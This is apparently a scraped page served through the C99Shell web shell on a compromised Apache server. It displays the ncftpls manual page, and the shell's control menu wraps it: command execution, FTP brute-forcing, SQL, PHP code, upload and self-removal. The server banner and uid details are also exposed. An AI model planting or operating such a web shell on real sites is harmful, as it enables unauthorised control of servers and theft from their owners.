!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/usr/doc/ncftp-3.1.5/html/   drwxr-xr-x
Free 318.3 GB of 458.09 GB (69.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ncftpls.html (4.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ncftpls(1) manual page

Name

ncftpls - Internet file transfer program for scripts

Synopsis

ncftpls [options] ftp://url.style/host/path/name/

Options

Command line flags:
-1
Most basic format, one item per line.
-l
Long list format.
-R
Long list format, recurse subdirectories. Equivalent to "-x -lR".
-x -XX
Additional ls flags to pass on to the server.
-u XX
Use username XX instead of anonymous.
-p XX
Use password XX with the username.
-P XX
Use port number XX instead of the default FTP service port (21).
-d XX
Use the file XX for debug logging.
-t XX
Timeout after XX seconds.
-E
Use regular (PORT) data connections.
-F
Use passive (PASV) data connections.  The default is to use passive, but to fallback to regular if the passive connection fails or times out.
-r XX
Redial a maximum of XX times until connected to the remote FTP server.
-W XX
Send raw FTP command XX after logging in.
-X XX
Send raw FTP command XX after each file transferred.
-Y XX
Send raw FTP command XX before logging out.

The -W, -X, and -Y options are useful for advanced users who need to tweak behavior on some servers. For example, users accessing mainframes might need to send some special SITE commands to set blocksize and record format information.

For these options, you can use them multiple times each if you need to send multiple commands. For the -X option, you can use the cookie %s to expand into the name of the file that was transferred.

Description

The purpose of ncftpls is to do remote directory listings using the File Transfer Protocol without entering an interactive shell. This lets you write shell scripts or other unattended processes that can do FTP.

The default behavior is to print the directory listing in columnized format (i.e. ls -CF), but that is not very useful for scripting. This example uses the -1 flag, to print one file per line:

$ ncftpls -1 ftp://ftp.ncftp.com/pub/ncftp/

You can also do a remote "ls -l", by using "ncftpls -l". If you want to try other flags, you have to use them with the -x flag. For example, if you wanted to do a remote "ls -lrt", you could do this:

$ ncftpls -x "-lrt" ftp://ftp.ncftp.com/pub/ncftp/

By default the program tries to open the remote host and login anonymously, but you can specify a username and password information like you can with ncftpget or ncftpput.

Diagnostics

ncftpls returns the following exit values:

  1. Success.
  2. Could not connect to remote host.
  3. Could not connect to remote host - timed out.
  4. Transfer failed.
  5. Transfer failed - timed out.
  6. Directory change failed.
  7. Directory change failed - timed out.
  8. Malformed URL.
  9. Usage error.
  10. Error in login configuration file.
  11. Library initialization failed.
  12. Session initialization failed.

Author

Mike Gleason, NcFTP Software (mgleason@ncftp.com).

See Also

ncftpput(1), ncftpget(1), ncftp(1), ftp(1), rcp(1), tftp(1).

LibNcFTP (http://www.ncftp.com/libncftp/).


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0278 ]--